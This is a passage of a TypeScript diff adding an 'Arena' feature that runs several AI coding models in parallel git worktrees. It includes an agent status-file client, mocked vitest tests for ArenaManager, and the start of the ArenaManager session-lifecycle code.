process.env['ARENA_AGENT_ID']; + const sessionId = process.env['ARENA_SESSION_ID']; + const sessionDir = process.env['ARENA_SESSION_DIR']; + + if (!agentId || !sessionId || !sessionDir) { + return null; + } + + return new ArenaAgentClient(agentId, sessionDir); + } + + constructor( + private readonly agentId: string, + arenaSessionDir: string, + ) { + const safe = safeAgentId(agentId); + this.agentsDir = path.join(arenaSessionDir, AGENTS_SUBDIR); + this.controlDir = path.join(arenaSessionDir, CONTROL_SUBDIR); + this.statusFilePath = path.join(this.agentsDir, `${safe}.json`); + this.controlFilePath = path.join(this.controlDir, `${safe}.json`); + this.startTimeMs = Date.now(); + } + + /** + * Initialize the agents/ and control/ directories under the arena session + * dir. Called automatically on first use if not invoked explicitly. + */ + async init(): Promise { + await fs.mkdir(this.agentsDir, { recursive: true }); + await fs.mkdir(this.controlDir, { recursive: true }); + this.initialized = true; + debugLogger.info( + `ArenaAgentClient initialized for agent ${this.agentId} at ${this.agentsDir}`, + ); + } + + /** + * Write current status to the per-agent status file using atomic write + * (write to temp file then rename). + * + * Stats are derived automatically from uiTelemetryService which is the + * canonical source for token counts, tool calls, and API request counts. + */ + async updateStatus(currentActivity?: string): Promise { + await this.ensureInitialized(); + + const stats = this.getStatsFromTelemetry(); + + const statusFile: ArenaStatusFile = { + agentId: this.agentId, + status: AgentStatus.RUNNING, + updatedAt: Date.now(), + rounds: stats.rounds, + currentActivity, + stats, + finalSummary: null, + error: null, + }; + + await atomicWriteJSON(this.statusFilePath, statusFile); + } + + /** + * Read and delete control.json (consume-once pattern). + * Returns null if no control signal is pending. + */ + async checkControlSignal(): Promise { + await this.ensureInitialized(); + + try { + const content = await fs.readFile(this.controlFilePath, 'utf-8'); + // Parse before deleting so a corrupted file isn't silently consumed + const signal = JSON.parse(content) as ArenaControlSignal; + await fs.unlink(this.controlFilePath); + return signal; + } catch (error: unknown) { + // File doesn't exist = no signal pending + if (isNodeError(error) && error.code === 'ENOENT') { + return null; + } + // Re-throw permission errors so they surface immediately + if (isNodeError(error) && error.code === 'EACCES') { + throw error; + } + debugLogger.error('Error reading control signal:', error); + return null; + } + } + + /** + * Report that the agent has completed the current task successfully. + * This is the primary signal to the main process that the agent is done working. + */ + async reportCompleted(finalSummary?: string): Promise { + await this.ensureInitialized(); + + const stats = this.getStatsFromTelemetry(); + + const statusFile: ArenaStatusFile = { + agentId: this.agentId, + status: AgentStatus.COMPLETED, + updatedAt: Date.now(), + rounds: stats.rounds, + stats, + finalSummary: finalSummary ?? null, + error: null, + }; + + await atomicWriteJSON(this.statusFilePath, statusFile); + } + + /** + * Report that the agent hit an error (API/auth/rate-limit, loop, etc.). + */ + async reportError(errorMessage: string): Promise { + await this.ensureInitialized(); + + const stats = this.getStatsFromTelemetry(); + + const statusFile: ArenaStatusFile = { + agentId: this.agentId, + status: AgentStatus.FAILED, + updatedAt: Date.now(), + rounds: stats.rounds, + stats, + finalSummary: null, + error: errorMessage, + }; + + await atomicWriteJSON(this.statusFilePath, statusFile); + } + + /** + * Report that the agent's current request was cancelled by the user. + */ + async reportCancelled(): Promise { + await this.ensureInitialized(); + + const stats = this.getStatsFromTelemetry(); + + const statusFile: ArenaStatusFile = { + agentId: this.agentId, + status: AgentStatus.CANCELLED, + updatedAt: Date.now(), + rounds: stats.rounds, + stats, + finalSummary: null, + error: null, + }; + + await atomicWriteJSON(this.statusFilePath, statusFile); + } + + /** + * Build ArenaAgentStats from uiTelemetryService metrics + */ + private getStatsFromTelemetry(): ArenaAgentStats { + const metrics = uiTelemetryService.getMetrics(); + + let rounds = 0; + let totalTokens = 0; + let inputTokens = 0; + let outputTokens = 0; + + for (const model of Object.values(metrics.models)) { + rounds += model.api.totalRequests; + totalTokens += model.tokens.total; + inputTokens += model.tokens.prompt; + outputTokens += model.tokens.candidates; + } + + return { + rounds, + totalTokens, + inputTokens, + outputTokens, + durationMs: Date.now() - this.startTimeMs, + toolCalls: metrics.tools.totalCalls, + successfulToolCalls: metrics.tools.totalSuccess, + failedToolCalls: metrics.tools.totalFail, + }; + } + + private async ensureInitialized(): Promise { + if (!this.initialized) { + await this.init(); + } + } +} diff --git a/packages/core/src/agents/arena/ArenaManager.test.ts b/packages/core/src/agents/arena/ArenaManager.test.ts new file mode 100644 index 000000000..a21f15d63 --- /dev/null +++ b/packages/core/src/agents/arena/ArenaManager.test.ts @@ -0,0 +1,505 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import { describe, it, expect, beforeEach, afterEach, vi } from 'vitest'; +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import * as os from 'node:os'; +import { ArenaManager } from './ArenaManager.js'; +import { ArenaEventType } from './arena-events.js'; +import { ArenaSessionStatus, ARENA_MAX_AGENTS } from './types.js'; + +const hoistedMockSetupWorktrees = vi.hoisted(() => vi.fn()); +const hoistedMockCleanupSession = vi.hoisted(() => vi.fn()); +const hoistedMockGetWorktreeDiff = vi.hoisted(() => vi.fn()); +const hoistedMockApplyWorktreeChanges = vi.hoisted(() => vi.fn()); +const hoistedMockDetectBackend = vi.hoisted(() => vi.fn()); + +vi.mock('../index.js', async (importOriginal) => { + const actual = await importOriginal(); + return { + ...actual, + detectBackend: hoistedMockDetectBackend, + }; +}); + +// Mock GitWorktreeService to avoid real git operations. +// The class mock includes static methods used by ArenaManager. +vi.mock('../../services/gitWorktreeService.js', () => { + const MockClass = vi.fn().mockImplementation(() => ({ + checkGitAvailable: vi.fn().mockResolvedValue({ available: true }), + isGitRepository: vi.fn().mockResolvedValue(true), + setupWorktrees: hoistedMockSetupWorktrees, + cleanupSession: hoistedMockCleanupSession, + getWorktreeDiff: hoistedMockGetWorktreeDiff, + applyWorktreeChanges: hoistedMockApplyWorktreeChanges, + })); + // Static methods called by ArenaManager + (MockClass as unknown as Record)['getBaseDir'] = () => + path.join(os.tmpdir(), 'arena-mock'); + (MockClass as unknown as Record)['getSessionDir'] = ( + sessionId: string, + ) => path.join(os.tmpdir(), 'arena-mock', sessionId); + (MockClass as unknown as Record)['getWorktreesDir'] = ( + sessionId: string, + ) => path.join(os.tmpdir(), 'arena-mock', sessionId, 'worktrees'); + return { GitWorktreeService: MockClass }; +}); + +// Mock the Config class +const createMockConfig = ( + workingDir: string, + arenaSettings: Record = {}, +) => ({ + getWorkingDir: () => workingDir, + getModel: () => 'test-model', + getSessionId: () => 'test-session', + getUserMemory: () => '', + getToolRegistry: () => ({ + getFunctionDeclarations: () => [], + getFunctionDeclarationsFiltered: () => [], + getTool: () => undefined, + }), + getAgentsSettings: () => ({ arena: arenaSettings }), + getUsageStatisticsEnabled: () => false, + getTelemetryEnabled: () => false, + getTelemetryLogPromptsEnabled: () => false, +}); + +describe('ArenaManager', () => { + let tempDir: string; + let mockConfig: ReturnType; + let mockBackend: ReturnType; + + beforeEach(async () => { + // Create a temp directory - no need for git repo since we mock GitWorktreeService + tempDir = await fs.mkdtemp(path.join(os.tmpdir(), 'arena-test-')); + // Use tempDir as worktreeBaseDir to avoid slow filesystem access in deriveWorktreeDirName + mockConfig = createMockConfig(tempDir, { worktreeBaseDir: tempDir }); + + mockBackend = createMockBackend(); + hoistedMockDetectBackend.mockResolvedValue({ backend: mockBackend }); + + hoistedMockSetupWorktrees.mockImplementation( + async ({ + sessionId, + sourceRepoPath, + worktreeNames, + }: { + sessionId: string; + sourceRepoPath: string; + worktreeNames: string[]; + }) => { + const worktrees = worktreeNames.map((name) => ({ + id: `${sessionId}/${name}`, + name, + path: path.join(sourceRepoPath, `.arena-${sessionId}`, name), + branch: `arena/${sessionId}/${name}`, + isActive: true, + createdAt: Date.now(), + })); + + return { + success: true, + sessionId, + worktrees, + worktreesByName: Object.fromEntries( + worktrees.map((worktree) => [worktree.name, worktree]), + ), + errors: [], + }; + }, + ); + hoistedMockCleanupSession.mockResolvedValue({ + success: true, + removedWorktrees: [], + removedBranches: [], + errors: [], + }); + hoistedMockGetWorktreeDiff.mockResolvedValue(''); + hoistedMockApplyWorktreeChanges.mockResolvedValue({ success: true }); + }); + + afterEach(async () => { + try { + await fs.rm(tempDir, { recursive: true, force: true }); + } catch { + // Ignore cleanup errors + } + }); + + describe('constructor', () => { + it('should create an ArenaManager instance', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager).toBeDefined(); + expect(manager.getSessionId()).toBeUndefined(); + expect(manager.getSessionStatus()).toBe(ArenaSessionStatus.INITIALIZING); + }); + + it('should not have a backend before start', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getBackend()).toBeNull(); + }); + }); + + describe('start validation', () => { + it('should reject start with less than 2 models', async () => { + const manager = new ArenaManager(mockConfig as never); + + await expect( + manager.start({ + models: [{ modelId: 'model-1', authType: 'openai' }], + task: 'Test task', + }), + ).rejects.toThrow('Arena requires at least 2 models'); + }); + + it('should reject start with more than max models', async () => { + const manager = new ArenaManager(mockConfig as never); + + const models = Array.from({ length: ARENA_MAX_AGENTS + 1 }, (_, i) => ({ + modelId: `model-${i}`, + authType: 'openai', + })); + + await expect( + manager.start({ + models, + task: 'Test task', + }), + ).rejects.toThrow( + `Arena supports a maximum of ${ARENA_MAX_AGENTS} models`, + ); + }); + + it('should reject start with empty task', async () => { + const manager = new ArenaManager(mockConfig as never); + + await expect( + manager.start({ + models: [ + { modelId: 'model-1', authType: 'openai' }, + { modelId: 'model-2', authType: 'openai' }, + ], + task: '', + }), + ).rejects.toThrow('Arena requires a task/prompt'); + }); + + it('should reject start with duplicate model IDs', async () => { + const manager = new ArenaManager(mockConfig as never); + + await expect( + manager.start({ + models: [ + { modelId: 'model-1', authType: 'openai' }, + { modelId: 'model-1', authType: 'openai' }, + ], + task: 'Test task', + }), + ).rejects.toThrow('Arena models must have unique identifiers'); + }); + }); + + describe('event emitter', () => { + it('should return the event emitter', () => { + const manager = new ArenaManager(mockConfig as never); + const emitter = manager.getEventEmitter(); + expect(emitter).toBeDefined(); + expect(typeof emitter.on).toBe('function'); + expect(typeof emitter.off).toBe('function'); + expect(typeof emitter.emit).toBe('function'); + }); + }); + + describe('PTY interaction methods', () => { + it('should expose PTY interaction methods', () => { + const manager = new ArenaManager(mockConfig as never); + expect(typeof manager.switchToAgent).toBe('function'); + expect(typeof manager.switchToNextAgent).toBe('function'); + expect(typeof manager.switchToPreviousAgent).toBe('function'); + expect(typeof manager.getActiveAgentId).toBe('function'); + expect(typeof manager.getActiveSnapshot).toBe('function'); + expect(typeof manager.getAgentSnapshot).toBe('function'); + expect(typeof manager.forwardInput).toBe('function'); + expect(typeof manager.resizeAgents).toBe('function'); + }); + + it('should return null for active agent ID when no session', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getActiveAgentId()).toBeNull(); + }); + + it('should return null for active snapshot when no session', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getActiveSnapshot()).toBeNull(); + }); + }); + + describe('cancel', () => { + it('should handle cancel when no session is active', async () => { + const manager = new ArenaManager(mockConfig as never); + await expect(manager.cancel()).resolves.not.toThrow(); + }); + }); + + describe('cleanup', () => { + it('should handle cleanup when no session is active', async () => { + const manager = new ArenaManager(mockConfig as never); + await expect(manager.cleanup()).resolves.not.toThrow(); + }); + }); + + describe('getAgentStates', () => { + it('should return empty array when no agents', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getAgentStates()).toEqual([]); + }); + }); + + describe('getAgentState', () => { + it('should return undefined for non-existent agent', () => { + const manager = new ArenaManager(mockConfig as never); + expect(manager.getAgentState('non-existent')).toBeUndefined(); + }); + }); + + describe('applyAgentResult', () => { + it('should return error for non-existent agent', async () => { + const manager = new ArenaManager(mockConfig as never); + const result = await manager.applyAgentResult('non-existent'); + expect(result.success).toBe(false); + expect(result.error).toContain('not found'); + }); + }); + + describe('getAgentDiff', () => { + it('should return error message for non-existent agent', async () => { + const manager = new ArenaManager(mockConfig as never); + const diff = await manager.getAgentDiff('non-existent'); + expect(diff).toContain('not found'); + }); + }); + + describe('backend initialization', () => { + it('should emit SESSION_UPDATE with type warning when backend detection returns warning', async () => { + const manager = new ArenaManager(mockConfig as never); + const updates: Array<{ + type: string; + message: string; + sessionId: string; + }> = []; + manager.getEventEmitter().on(ArenaEventType.SESSION_UPDATE, (event) => { + updates.push({ + type: event.type, + message: event.message, + sessionId: event.sessionId, + }); + }); + + hoistedMockDetectBackend.mockResolvedValueOnce({ + backend: mockBackend, + warning: 'fallback to tmux backend', + }); + + await manager.start(createValidStartOptions()); + + expect(hoistedMockDetectBackend).toHaveBeenCalledWith( + undefined, + expect.anything(), + ); + const warningUpdate = updates.find((u) => u.type === 'warning'); + expect(warningUpdate).toBeDefined(); + expect(warningUpdate?.message).toContain('fallback to tmux backend'); + expect(warningUpdate?.sessionId).toBe('test-session'); + }); + + it('should emit SESSION_ERROR and mark FAILED when backend init fails', async () => { + const manager = new ArenaManager(mockConfig as never); + const sessionErrors: string[] = []; + manager.getEventEmitter().on(ArenaEventType.SESSION_ERROR, (event) => { + sessionErrors.push(event.error); + }); + + mockBackend.init.mockRejectedValueOnce(new Error('init failed')); + + await expect(manager.start(createValidStartOptions())).rejects.toThrow( + 'init failed', + ); + expect(manager.getSessionStatus()).toBe(ArenaSessionStatus.FAILED); + expect(sessionErrors).toEqual(['init failed']); + }); + }); + + describe('chat history forwarding', () => { + it('should pass chatHistory to backend spawnAgent calls', async () => { + const manager = new ArenaManager(mockConfig as never); + const chatHistory = [ + { role: 'user' as const, parts: [{ text: 'prior question' }] }, + { role: 'model' as const, parts: [{ text: 'prior answer' }] }, + ]; + + await manager.start({ + ...createValidStartOptions(), + chatHistory, + }); + + // Both agents should have been spawned with chatHistory in + // the inProcess config. + expect(mockBackend.spawnAgent).toHaveBeenCalledTimes(2); + for (const call of mockBackend.spawnAgent.mock.calls) { + const spawnConfig = call[0] as { + inProcess?: { chatHistory?: unknown }; + }; + expect(spawnConfig.inProcess?.chatHistory).toEqual(chatHistory); + } + }); + + it('should pass undefined chatHistory when not provided', async () => { + const manager = new ArenaManager(mockConfig as never); + + await manager.start(createValidStartOptions()); + + expect(mockBackend.spawnAgent).toHaveBeenCalledTimes(2); + for (const call of mockBackend.spawnAgent.mock.calls) { + const spawnConfig = call[0] as { + inProcess?: { chatHistory?: unknown }; + }; + expect(spawnConfig.inProcess?.chatHistory).toBeUndefined(); + } + }); + }); + + describe('active session lifecycle', () => { + it('cancel should stop backend and move session to CANCELLED', async () => { + const manager = new ArenaManager(mockConfig as never); + + // Disable auto-exit so agents stay running until we cancel. + mockBackend.setAutoExit(false); + + const startPromise = manager.start({ + ...createValidStartOptions(), + timeoutSeconds: 30, + }); + + // Wait until the backend has spawned all agents. + // (Agents are spawned sequentially; cancelling between spawns would + // cause spawnAgentPty to overwrite the CANCELLED status back to RUNNING.) + await waitForCondition( + () => mockBackend.spawnAgent.mock.calls.length >= 2, + ); + + await manager.cancel(); + expect(mockBackend.stopAll).toHaveBeenCalledTimes(1); + expect(manager.getSessionStatus()).toBe(ArenaSessionStatus.CANCELLED); + + await startPromise; + expect(manager.getSessionStatus()).toBe(ArenaSessionStatus.CANCELLED); + }); + + it('cleanup should release backend and worktree resources after start', async () => { + const manager = new ArenaManager(mockConfig as never); + + // auto-exit is on by default, so agents terminate quickly. + await manager.start(createValidStartOptions()); + + await manager.cleanup(); + + expect(mockBackend.cleanup).toHaveBeenCalledTimes(1); + // cleanupSession is called with worktreeDirName (short ID), not the full sessionId. + // For 'test-session', the short ID is 'testsess' (first 8 chars with dashes removed). + expect(hoistedMockCleanupSession).toHaveBeenCalledWith('testsess'); + expect(manager.getBackend()).toBeNull(); + expect(manager.getSessionId()).toBeUndefined(); + }); + }); +}); + +describe('ARENA_MAX_AGENTS', () => { + it('should be 5', () => { + expect(ARENA_MAX_AGENTS).toBe(5); + }); +}); + +function createMockBackend() { + type ExitCb = ( + agentId: string, + exitCode: number | null, + signal: number | null, + ) => void; + let onAgentExit: ExitCb | null = null; + let autoExit = true; + + const backend = { + type: 'tmux' as const, + init: vi.fn().mockResolvedValue(undefined), + spawnAgent: vi.fn(async (config: { agentId: string }) => { + // By default, simulate immediate agent termination so tests + // don't hang in waitForAllAgentsSettled. + if (autoExit) { + setTimeout(() => onAgentExit?.(config.agentId, 0, null), 5); + } + }), + stopAgent: vi.fn(), + stopAll: vi.fn(), + cleanup: vi.fn().mockResolvedValue(undefined), + setOnAgentExit: vi.fn((cb: ExitCb) => { + onAgentExit = cb; + }), + waitForAll: vi.fn().mockResolvedValue(true), + switchTo: vi.fn(), + switchToNext: vi.fn(), + switchToPrevious: vi.fn(), + getActiveAgentId: vi.fn().mockReturnValue(null), + getActiveSnapshot: vi.fn().mockReturnValue(null), + getAgentSnapshot: vi.fn().mockReturnValue(null), + getAgentScrollbackLength: vi.fn().mockReturnValue(0), + forwardInput: vi.fn().mockReturnValue(false), + writeToAgent: vi.fn().mockReturnValue(false), + resizeAll: vi.fn(), + getAttachHint: vi.fn().mockReturnValue(null), + /** Disable automatic agent exit for tests that need to control timing. */ + setAutoExit(value: boolean) { + autoExit = value; + }, + }; + return backend; +} + +function createValidStartOptions() { + return { + models: [ + { modelId: 'model-1', authType: 'openai' }, + { modelId: 'model-2', authType: 'openai' }, + ], + task: 'Implement feature X', + }; +} + +async function waitForMicrotask(): Promise { + // Use setImmediate (or setTimeout fallback) to yield to the event loop + // and allow other async operations (like the start() method) to progress. + await new Promise((resolve) => { + if (typeof setImmediate === 'function') { + setImmediate(resolve); + } else { + setTimeout(resolve, 0); + } + }); +} + +async function waitForCondition( + predicate: () => boolean, + timeoutMs = 1000, +): Promise { + const startedAt = Date.now(); + while (!predicate()) { + if (Date.now() - startedAt > timeoutMs) { + throw new Error('Timed out while waiting for condition'); + } + await waitForMicrotask(); + } +} diff --git a/packages/core/src/agents/arena/ArenaManager.ts b/packages/core/src/agents/arena/ArenaManager.ts new file mode 100644 index 000000000..6a386158f --- /dev/null +++ b/packages/core/src/agents/arena/ArenaManager.ts @@ -0,0 +1,1648 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +import * as fs from 'node:fs/promises'; +import * as path from 'node:path'; +import { GitWorktreeService } from '../../services/gitWorktreeService.js'; +import { Storage } from '../../config/storage.js'; +import type { Config } from '../../config/config.js'; +import { getCoreSystemPrompt } from '../../core/prompts.js'; +import { createDebugLogger } from '../../utils/debugLogger.js'; +import { isNodeError } from '../../utils/errors.js'; +import { atomicWriteJSON } from '../../utils/atomicFileWrite.js'; +import type { AnsiOutput } from '../../utils/terminalSerializer.js'; +import { ArenaEventEmitter, ArenaEventType } from './arena-events.js'; +import type { AgentSpawnConfig, Backend, DisplayMode } from '../index.js'; +import { detectBackend, DISPLAY_MODE } from '../index.js'; +import type { InProcessBackend } from '../backends/InProcessBackend.js'; +import { + AgentEventType, + type AgentStatusChangeEvent, +} from '../runtime/agent-events.js'; +import { + type ArenaConfig, + type ArenaConfigFile, + type ArenaControlSignal, + type ArenaStartOptions, + type ArenaAgentResult, + type ArenaSessionResult, + type ArenaAgentState, + type ArenaCallbacks, + type ArenaStatusFile, + ArenaSessionStatus, + ARENA_MAX_AGENTS, + safeAgentId, +} from './types.js'; +import { + AgentStatus, + isTerminalStatus, + isSettledStatus, + isSuccessStatus, +} from '../runtime/agent-types.js'; +import { + logArenaSessionStarted, + logArenaAgentCompleted, + logArenaSessionEnded, + makeArenaSessionStartedEvent, + makeArenaAgentCompletedEvent, + makeArenaSessionEndedEvent, +} from '../../telemetry/index.js'; +import type { ArenaSessionEndedStatus } from '../../telemetry/index.js'; + +const debugLogger = createDebugLogger('ARENA'); + +const ARENA_POLL_INTERVAL_MS = 500; + +/** + * ArenaManager orchestrates multi-model competitive execution. + * + * It manages: + * - Git worktree creation for isolated environments + * - Parallel agent execution via PTY subprocesses (through Backend) + * - Event emission for UI updates + * - Result collection and comparison + * - Active agent switching, input routing, and screen capture + */ +export class ArenaManager { + private readonly config: Config; + private readonly eventEmitter: ArenaEventEmitter; + private readonly worktreeService: GitWorktreeService; + private readonly arenaBaseDir: string; + private readonly callbacks: ArenaCallbacks; + private backend: Backend | null = null; + private cachedResult: ArenaSessionResult | null = null; + + private sessionId: string | undefined; + /** Short directory name used for worktree paths (derived from sessionId). */ + private worktreeDirName: string | undefined; + private sessionStatus: ArenaSessionStatus = ArenaSessionStatus.INITIALIZING; + private agents: Map = new Map(); + private arenaConfig: ArenaConfig | undefined; + + private startedAt: number | undefined; + private masterAbortController: AbortController | undefined; + private terminalCols: number; + private terminalRows: number; + private pollingInterval: ReturnType | null = null; + private lifecyclePromise: Promise | null = null; + /** Cleanup functions for in-process event bridge listeners. */ + private eventBridgeCleanups: Array<() => void> = []; + /** Guard to prevent double-emitting the session-ended telemetry event. */ + private sessionEndedLogged = false; + + constructor(config: Config, callbacks: ArenaCallbacks = {}) { + this.config = config; + this.callbacks = callbacks; + this.eventEmitter = new ArenaEventEmitter(); + const arenaSettings = config.getAgentsSettings().arena; + // Use the user-configured base dir, or default to ~/.qwen/arena. + this.arenaBaseDir = + arenaSettings?.worktreeBaseDir ?? + path.join(Storage.getGlobalQwenDir(), 'arena'); + this.worktreeService = new GitWorktreeService( + config.getWorkingDir(), + this.arenaBaseDir, + ); + this.terminalCols = process.stdout.columns || 120; + this.terminalRows = process.stdout.rows || 40; + } + + // ─── Public API ──────────────────────────────────────────────── + + /** + * Get the event emitter for subscribing to Arena events. + */ + getEventEmitter(): ArenaEventEmitter { + return this.eventEmitter; + } + + /** + * Get the current session ID. + */ + getSessionId(): string | undefined { + return this.sessionId; + } + + /** + * Get the current session status. + */ + getSessionStatus(): ArenaSessionStatus { + return this.sessionStatus; + } + + /** + * Get the current task description (available while session is active). + */ + getTask(): string | undefined { + return this.arenaConfig?.task; + } + + /** + * Get all agent states. + */ + getAgentStates(): ArenaAgentState[] { + return Array.from(this.agents.values()); + } + + /** + * Get a specific agent state. + */ + getAgentState(agentId: string): ArenaAgentState | undefined { + return this.agents.get(agentId); + } + + /** + * Get the cached session result (available after session completes). + */ + getResult(): ArenaSessionResult | null { + return this.cachedResult; + } + + /** + * Get the underlying backend for direct access. + * Returns null before the session initializes a backend. + */ + getBackend(): Backend | null { + return this.backend; + } + + /** + * Store the outer lifecycle promise so cancel/stop can wait for start() + * to fully unwind before proceeding with cleanup. + */ + setLifecyclePromise(p: Promise): void { + this.lifecyclePromise = p; + } + + /** + * Wait for the start lifecycle to fully settle (including error handling + * and listener teardown). Resolves immediately if no lifecycle is active. + */ + async waitForSettled(): Promise { + if (this.lifecyclePromise) { + await this.lifecyclePromise; + } + } + + // ─── PTY Interaction ─────────────────────────────────────────── + + /** + * Switch the active agent for screen display and input routing. + */ + switchToAgent(agentId: string): void { + this.backend?.switchTo(agentId); + } + + /** + * Switch to the next agent in order. + */ + switchToNextAgent(): void { + this.backend?.switchToNext(); + } + + /** + * Switch to the previous agent in order. + */ + switchToPreviousAgent(): void { + this.backend?.switchToPrevious(); + } + + /** + * Get the ID of the currently active agent. + */ + getActiveAgentId(): string | null { + return this.backend?.getActiveAgentId() ?? null; + } + + /** + * Get the screen snapshot for the currently active agent. + */ + getActiveSnapshot(): AnsiOutput | null { + return this.backend?.getActiveSnapshot() ?? null; + } + + /** + * Get the screen snapshot for a specific agent. + */ + getAgentSnapshot( + agentId: string, + scrollOffset: number = 0, + ): AnsiOutput | null { + return this.backend?.getAgentSnapshot(agentId, scrollOffset) ?? null; + } + + /** + * Get the maximum scrollback length for an agent's terminal buffer. + */ + getAgentScrollbackLength(agentId: string): number { + return this.backend?.getAgentScrollbackLength(agentId) ?? 0; + } + + /** + * Forward keyboard input to the currently active agent. + */ + forwardInput(data: string): boolean { + return this.backend?.forwardInput(data) ?? false; + } + + /** + * Resize all agent terminals. + */ + resizeAgents(cols: number, rows: number): void { + this.terminalCols = cols; + this.terminalRows = rows; + this.backend?.resizeAll(cols, rows); + } + + // ─── Session Lifecycle ───────────────────────────────────────── + + /** + * Start an Arena session. + * + * @param options - Arena start options + * @returns Promise resolving to the session result + */ + async start(options: ArenaStartOptions): Promise { + // Validate options + this.validateStartOptions(options); + + // Use caller-provided terminal size if available + if (options.cols && options.cols > 0) { + this.terminalCols = options.cols; + } + if (options.rows && options.rows > 0) { + this.terminalRows = options.rows; + } + + this.sessionId = this.config.getSessionId(); + this.worktreeDirName = await this.deriveWorktreeDirName(this.sessionId); + this.startedAt = Date.now(); + this.sessionStatus = ArenaSessionStatus.INITIALIZING; + this.masterAbortController = new AbortController(); + + const sourceRepoPath = this.config.getWorkingDir(); + const arenaSettings = this.config.getAgentsSettings().arena; + + this.arenaConfig = { + sessionId: this.sessionId, + task: options.task, + models: options.models, + maxRoundsPerAgent: + options.maxRoundsPerAgent ?? arenaSettings?.maxRoundsPerAgent, + timeoutSeconds: options.timeoutSeconds ?? arenaSettings?.timeoutSeconds, + approvalMode: options.approvalMode, + sourceRepoPath, + chatHistory: options.chatHistory, + }; + + debugLogger.info(`Starting Arena session: ${this.sessionId}`); + debugLogger.info(`Task: ${options.task}`); + debugLogger.info( + `Models: ${options.models.map((m) => m.modelId).join(', ')}`, + ); + + // Fail fast on missing git or non-repo directory before any UI output + // so the user gets a clean, single error message without the + // "Arena started…" banner. + const gitCheck = await this.worktreeService.checkGitAvailable(); + if (!gitCheck.available) { + throw new Error(gitCheck.error!); + } + const isRepo = await this.worktreeService.isGitRepository(); + if (!isRepo) { + throw new Error( + 'Failed to start arena: current directory is not a git repository.', + ); + } + + // Emit session start event + this.eventEmitter.emit(ArenaEventType.SESSION_START, { + sessionId: this.sessionId, + task: options.task, + models: options.models, + timestamp: Date.now(), + }); + + // Log arena session start telemetry + logArenaSessionStarted( + this.config, + makeArenaSessionStartedEvent({ + arena_session_id: this.sessionId, + model_ids: options.models.map((m) => m.modelId), + task_length: options.task.length, + }), + ); + + try { + // Detect and initialize the backend. + // Priority: explicit option > agents.displayMode setting > auto-detect + const displayMode = + options.displayMode ?? + (this.config.getAgentsSettings().displayMode as + | DisplayMode + | undefined); + await this.initializeBackend(displayMode); + + // If cancelled during backend init, bail out early + if (this.masterAbortController?.signal.aborted) { + this.sessionStatus = ArenaSessionStatus.CANCELLED; + const result = await this.collectResults(); + this.emitSessionEnded('cancelled'); + return result; + } + + // Set up worktrees for all agents + this.emitProgress(`Setting up environment for agents…`); + await this.setupWorktrees(); + + // If cancelled during worktree setup, bail out early + if (this.masterAbortController?.signal.aborted) { + this.sessionStatus = ArenaSessionStatus.CANCELLED; + const result = await this.collectResults(); + this.emitSessionEnded('cancelled'); + return result; + } + + // Emit worktree info for each agent + const worktreeInfo = Array.from(this.agents.values()) + .map( + (agent, i) => + ` ${i + 1}. ${agent.model.modelId} → ${agent.worktree.path}`, + ) + .join('\n'); + this.emitProgress(`Environment ready. Agent worktrees:\n${worktreeInfo}`); + + // Start all agents in parallel via PTY + this.emitProgress('Launching agents…'); + this.sessionStatus = ArenaSessionStatus.RUNNING; + await this.runAgents(); + + // Mark session as idle (agents finished but still alive) unless + // already cancelled/timed out. + if (this.sessionStatus === ArenaSessionStatus.RUNNING) { + this.sessionStatus = ArenaSessionStatus.IDLE; + } + + // Collect results (uses this.sessionStatus for result status) + const result = await this.collectResults(); + this.cachedResult = result; + + // Emit session complete event + this.eventEmitter.emit(ArenaEventType.SESSION_COMPLETE, { + sessionId: this.sessionId, + result, + timestamp: Date.now(), + }); + + this.callbacks.onArenaComplete?.(result); + + // NOTE: session-ended telemetry is NOT emitted here. + // The session is "done running" but the user hasn't picked a winner + // or discarded yet. The ended event fires from applyAgentResult() + // (status: 'selected') or cleanup/cleanupRuntime (status: 'discarded'). + + return result; + } catch (error) { + this.sessionStatus = ArenaSessionStatus.FAILED; + + const errorMessage = + error instanceof Error ? error.message : String(error); + + // Emit session error event + this.eventEmitter.emit(ArenaEventType.SESSION_ERROR, { + sessionId: this.sessionId, + error: errorMessage, + timestamp: Date.now(), + }); + + // Log arena session failed telemetry + this.emitSessionEnded('failed'); + + this.callbacks.onArenaError?.( + error instanceof Error ? error : new Error(errorMessage), + ); + + throw error; + } + } + + /** + * Cancel the current Arena session. + */ + async cancel(): Promise { + if (!this.sessionId) { + return; + } + + debugLogger.info(`Cancelling Arena session: ${this.sessionId}`); + + // Stop polling + this.stopPolling(); + + // Abort the master controller + this.masterAbortController?.abort(); + + // Force stop all PTY processes (sends Ctrl-C) + this.backend?.stopAll(); + + // Final stats sync so telemetry reflects the latest counters. + // For PTY agents: read each agent's status file one last time. + // For in-process agents: pull counters from the interactive object. + await this.pollAgentStatuses().catch(() => {}); + for (const agent of this.agents.values()) { + if (!isTerminalStatus(agent.status)) { + agent.syncStats?.(); + } + } + + // Update agent statuses — skip agents already in a terminal state + // (COMPLETED, FAILED, CANCELLED) so we don't overwrite a successful result. + for (const agent of this.agents.values()) { + if (!isTerminalStatus(agent.status)) { + agent.abortController.abort(); + agent.stats.durationMs = Date.now() - agent.startedAt; + this.updateAgentStatus(agent.agentId, AgentStatus.CANCELLED); + } + } + + this.sessionStatus = ArenaSessionStatus.CANCELLED; + + // NOTE: session-ended telemetry is NOT emitted here. + // start() emits 'cancelled' when it unwinds through its early-cancel + // paths. If cancel() is called after start() has already returned + // (all agents done, user viewing results), the ended event fires + // from cleanup() / cleanupRuntime() instead. + } + + /** + * Clean up the Arena session (remove worktrees, kill processes, etc.). + */ + async cleanup(): Promise { + if (!this.sessionId) { + return; + } + + debugLogger.info(`Cleaning up Arena session: ${this.sessionId}`); + + // If no session-ended event was emitted yet, emit before tearing down. + // Use 'cancelled' if the session was explicitly stopped, 'discarded' if + // the user simply left without picking a winner. + this.emitSessionEnded( + this.sessionStatus === ArenaSessionStatus.CANCELLED + ? 'cancelled' + : 